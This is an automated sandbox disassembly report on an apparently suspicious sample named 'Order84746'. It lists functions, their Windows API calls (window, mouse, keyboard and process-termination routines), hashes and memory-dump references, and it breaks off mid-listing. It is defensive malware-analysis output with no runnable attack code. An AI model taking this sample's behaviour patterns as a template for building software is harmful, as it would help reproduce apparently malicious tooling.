                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: 50101610cadf8ae1193e5b328c2c79087399f1631122c84b9c1bb26f1b7bc78b
                          • Instruction ID: 13338b2aa4d29b4d2f23b87717f9b388845005b121d0b83a437db93cc9330296
                          • Opcode Fuzzy Hash: 50101610cadf8ae1193e5b328c2c79087399f1631122c84b9c1bb26f1b7bc78b
                          • Instruction Fuzzy Hash: 91519F71E00229AFCB11EF69C945AAEB7F8FF48710F114499F915B7391CB70AE418B91
                          Function 00924AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00924B10
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924B5B
                          • IsMenu.USER32(00000000), ref: 00924B7B
                          • CreatePopupMenu.USER32 ref: 00924BAF
                          • GetMenuItemCount.USER32(000000FF), ref: 00924C0D
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00924C3E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: df4c0afbf3c86fa0ce04353f89e1592296ba0bfb545611dad6c1b2e6874d1d81
                          • Instruction ID: 5d8d9d19e3fe28392a3840d93b296f08d79992cfdc1d4c2142d17fd7906226c4
                          • Opcode Fuzzy Hash: df4c0afbf3c86fa0ce04353f89e1592296ba0bfb545611dad6c1b2e6874d1d81
                          • Instruction Fuzzy Hash: 2F51D470A02369DFDF20CF68E888BEDBBF8AF44314F144159F465AB299D3B09944CB51
                          Function 008FABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • BeginPaint.USER32(?,?,?), ref: 008FAC2A
                          • GetWindowRect.USER32(?,?), ref: 008FAC8E
                          • ScreenToClient.USER32(?,?), ref: 008FACAB
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008FACBC
                          • EndPaint.USER32(?,?,?,?,?), ref: 008FAD06
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0095E673
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 2592858361-0
                          • Opcode ID: f3957c0364d42fffd61892047c05c49472e0779b027577b8f95017d8aaa86782
                          • Instruction ID: 12bd68148b2b000d610d71695253b4c2d0fa88f1a7622334a03f14464343f37d
                          • Opcode Fuzzy Hash: f3957c0364d42fffd61892047c05c49472e0779b027577b8f95017d8aaa86782
                          • Instruction Fuzzy Hash: 0B4190B15092099FC710DF24CC84F767BA8FF5A374F140659FAA8C72A1C7719944EB62
                          Function 0094E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(009A1628,00000000,009A1628,00000000,00000000,009A1628,?,0095DC5D,00000000,?,00000000,00000000,00000000,?,0095DAD1,00000004), ref: 0094E40B
                          • EnableWindow.USER32(00000000,00000000), ref: 0094E42F
                          • ShowWindow.USER32(009A1628,00000000), ref: 0094E48F
                          • ShowWindow.USER32(00000000,00000004), ref: 0094E4A1
                          • EnableWindow.USER32(00000000,00000001), ref: 0094E4C5
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0094E4E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: d8687533820110cc74e3189318dda7e9dbe57fa80682533acee192cae7c8c123
                          • Instruction ID: 76220ac5b6b13389e8850f6e4181f640adc9826ab831c712411107ec2cdfa26f
                          • Opcode Fuzzy Hash: d8687533820110cc74e3189318dda7e9dbe57fa80682533acee192cae7c8c123
                          • Instruction Fuzzy Hash: 48417B70A05140EFDB26CF28C499F947BE5BF09314F1981B9EA598F2B2C771E842DB91
                          Function 009298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 009298D1
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00929908
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00929924
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0092999E
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009299B3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 009299D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 2537439066-0
                          • Opcode ID: 3036d9417f3898c7630e880b729d96af9f4d912dd4d9dc10517cb5aebf0ba9fc
                          • Instruction ID: 9caa928ca7eb6235af5dc36bab9baa5ac7f6b4d73e73d529e15362e7914f4067
                          • Opcode Fuzzy Hash: 3036d9417f3898c7630e880b729d96af9f4d912dd4d9dc10517cb5aebf0ba9fc
                          • Instruction Fuzzy Hash: D8318F31A00115ABDB00EFA9DC85EAEB778FF45710F1480A9FA04EB256D770DA54DBA1
                          Function 00939B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(?,?,?,?,?,?,009377F4,?,?,00000000,00000001), ref: 00939B53
                            • Part of subcall function 00936544: GetWindowRect.USER32(?,?), ref: 00936557
                          • GetDesktopWindow.USER32 ref: 00939B7D
                          • GetWindowRect.USER32(00000000), ref: 00939B84
                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00939BB6
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          • GetCursorPos.USER32(?), ref: 00939BE2
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00939C44
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                          • String ID:
                          • API String ID: 4137160315-0
                          • Opcode ID: 81d83b38ffc200e001948033961b00d0bb91ee45ac9a2d119f2cfd679e7f7aa6
                          • Instruction ID: 3d8c6022cb990d44ef7db3851a7f158bd86a3f1f9267008affb0fd60e4536b6d
                          • Opcode Fuzzy Hash: 81d83b38ffc200e001948033961b00d0bb91ee45ac9a2d119f2cfd679e7f7aa6
                          • Instruction Fuzzy Hash: 2E31E072609315AFD710DF54D849B9AB7EDFF88314F00092AF595E7181DAB0EA04CB92
                          Function 009316DA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • _wcstok.LIBCMT ref: 0093184E
                          • _wcscpy.LIBCMT ref: 009318DD
                          • _memset.LIBCMT ref: 00931910
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          • Opcode ID: ec3bd533dd501560d132f41cd50a3625bebf61c28eb756a4180bee34e278d67d
                          • Instruction ID: 76bd88378cf909b398d0c12b63571052da7dcf1c0a0ff17b2d1ffe6ee2bd6ad7
                          • Opcode Fuzzy Hash: ec3bd533dd501560d132f41cd50a3625bebf61c28eb756a4180bee34e278d67d
                          • Instruction Fuzzy Hash: 92C15B356083819FC724EF29C981A5AB7E4FF86354F00492DF999D72A2DB70ED05CB82
                          Function 0094EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FAFF2
                            • Part of subcall function 008FAF83: BeginPath.GDI32(?), ref: 008FB009
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FB033
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0094EC20
                          • LineTo.GDI32(00000000,00000003,?), ref: 0094EC34
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094EC42
                          • LineTo.GDI32(00000000,00000000,?), ref: 0094EC52
                          • EndPath.GDI32(00000000), ref: 0094EC62
                          • StrokePath.GDI32(00000000), ref: 0094EC72
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 8b4906e3db1d54a553f006de5810a20b817cb1517ebe31a6e633eb2ffda5c65e
                          • Instruction ID: b9cf8fe91e174e005b484a503d9529b73970f40d5214a17006fb5ed6f7fa269d
                          • Opcode Fuzzy Hash: 8b4906e3db1d54a553f006de5810a20b817cb1517ebe31a6e633eb2ffda5c65e
                          • Instruction Fuzzy Hash: E811397250414DBFEB029FA0DD88EEA7F6DEF08354F048016FE1889160C7B19D55EBA0
                          Function 0091E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 0091E1C0
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0091E1D1
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0091E1D8
                          • ReleaseDC.USER32(00000000,00000000), ref: 0091E1E0
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0091E1F7
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0091E209
                            • Part of subcall function 00919AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00919A05,00000000,00000000,?,00919DDB), ref: 0091A53A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          • Opcode ID: cce0a659e5472a96442cdc5b837b8558b4fb29f27cc732409dabf3d3b84c3e71
                          • Instruction ID: de41353b8af1522c29f296f92b9211dbd18b2c326d298b0aae5bf812ba8b2ad6
                          • Opcode Fuzzy Hash: cce0a659e5472a96442cdc5b837b8558b4fb29f27cc732409dabf3d3b84c3e71
                          • Instruction Fuzzy Hash: E8018FB5F04218BFEB109BA6CC45B5EBFB8EB48351F00406AEE04A7290D6B09C00CBA0
                          Function 00907B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                          Download Yara Rule
                          APIs
                          • __init_pointers.LIBCMT ref: 00907B47
                            • Part of subcall function 0090123A: __initp_misc_winsig.LIBCMT ref: 0090125E
                            • Part of subcall function 0090123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00907F51
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00907F65
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00907F78
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00907F8B
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00907F9E
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00907FB1
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00907FC4
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00907FD7
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00907FEA
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00907FFD
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00908010
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00908023
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00908036
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00908049
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0090805C
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0090806F
                          • __mtinitlocks.LIBCMT ref: 00907B4C
                            • Part of subcall function 00907E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0099AC68,00000FA0,?,?,00907B51,00905E77,00996C70,00000014), ref: 00907E41
                          • __mtterm.LIBCMT ref: 00907B55
                            • Part of subcall function 00907BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00907D3F
                            • Part of subcall function 00907BBD: _free.LIBCMT ref: 00907D46
                            • Part of subcall function 00907BBD: RtlDeleteCriticalSection.NTDLL(0099AC68), ref: 00907D68
                          • __calloc_crt.LIBCMT ref: 00907B7A
                          • GetCurrentThreadId.KERNEL32 ref: 00907BA3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          • Opcode ID: 492914b57eb73e1b216bf51702c100258adf5fd73730336fa5df3c7132e16ebf
                          • Instruction ID: 298ffc4ce9396ff2aaec179752296a0e3a6d0fa8854801ee29d4a42a466e3a22
                          • Opcode Fuzzy Hash: 492914b57eb73e1b216bf51702c100258adf5fd73730336fa5df3c7132e16ebf
                          • Instruction Fuzzy Hash: 8FF0BB32E1D3511DE62477F9BC0774BB6C59F41734B2406A9F860C50E2FF60B84251A0
                          Function 008E27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E281D
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E2825
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E2830
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E283B
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E2843
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E284B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 455128e7a1405e4d007ec5f1eccb8cd329e5b9a9d81435932ff21c1cdcd7bd59
                          • Instruction ID: 01dbf881f4f2a5e3e2439a5afa2b752fdfacaa4ad1bd77bdefd9c42eae713af4
                          • Opcode Fuzzy Hash: 455128e7a1405e4d007ec5f1eccb8cd329e5b9a9d81435932ff21c1cdcd7bd59
                          • Instruction Fuzzy Hash: 0B0167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                          Function 00929AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          • Opcode ID: e7da01a9658b810e7b82d43e278557fcc4073ea90a66c5375d03e97ffe1aa6c5
                          • Instruction ID: a6eaa66394c84d35b3ab199beda02cacc4891182841dcdf4079c7d7a9dfd9ff9
                          • Opcode Fuzzy Hash: e7da01a9658b810e7b82d43e278557fcc4073ea90a66c5375d03e97ffe1aa6c5
                          • Instruction Fuzzy Hash: BC01A432A17321ABDB156B55FD59EEF7769FF88701F04042DF513920A8DBB49800EB60
                          Function 00927BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00927C07
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00927C1D
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00927C2C
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C3B
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C45
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C4C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: 92daacda8e1af47966bb72daffeddb978a6db4b12cd8e25db3c1b691706bbd62
                          • Instruction ID: afbefe127c865d8867b6d3f61440d4b8af737326f73384044c28a3ebd8ba00dd
                          • Opcode Fuzzy Hash: 92daacda8e1af47966bb72daffeddb978a6db4b12cd8e25db3c1b691706bbd62
                          • Instruction Fuzzy Hash: BBF09A72A16158BBE7205BA2DC0EEEF7B7CEFCAB11F00001CFA11A1060D7E01A41E6B5
                          Function 00929A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00929A33
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00929A44
